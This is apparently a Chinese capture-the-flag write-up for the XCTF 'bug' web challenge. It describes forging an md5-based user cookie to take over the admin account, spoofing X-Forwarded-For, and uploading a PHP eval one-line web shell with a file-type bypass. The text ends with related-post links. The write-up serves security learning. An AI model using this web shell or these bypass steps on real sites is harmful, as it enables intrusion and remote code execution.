攻防世界Web-bug

打开链接

先注册一个账号

创建成功,会给一个UID=5

抓包的user值就是UID:用户名的md5加密的编码

点击Manage时要求admin用户

利用改包把user改成admin

1:admin的md5值为4b9987ccafacb8d8fc08d22bbca797ba

还要把url上的UID改为1

存在逻辑漏洞,成功越权

返回首页修改密码,之后以管理员的身份进去,点击manage

修改成功,重新登录

再点击Manage

显示ip不对,那就进行ip伪造

添加数据X-Forwarded-For:127.0.0.1

还是找不到flag

查看源代码

&do=???这部分表示有一个动作需要执行,但是具体的操作(???)没有给出,

试一下发现是upload

最后构造/index.php?module=filemanage&do=upload

不能直接上传一句话

需要绕过

<script language="php">@eval($ POST['11'])</script>

上传之后修改一下文件类型

相关推荐
hao_wujing几秒前
网络安全攻防演练中的常见计策
安全·web安全
燕雀安知鸿鹄之志哉.38 分钟前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
Mitch31142 分钟前
【漏洞复现】CVE-2015-5531 Arbitrary File Reading
web安全·elasticsearch·网络安全·docker·漏洞复现
网安-轩逸2 小时前
网络安全核心目标CIA
安全·web安全
无泡汽水7 小时前
漏洞检测工具:Swagger UI敏感信息泄露
python·web安全
WTT001113 小时前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
黑客Jack17 小时前
防御 XSS 的七条原则
安全·web安全·xss
东方隐侠安全团队-千里18 小时前
网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
网络·chrome·web安全
Mitch31119 小时前
【漏洞复现】CVE-2021-45788 SQL Injection
sql·web安全·docker·prometheus·metersphere
网络安全King20 小时前
网络安全 - SQL Injection
sql·web安全·php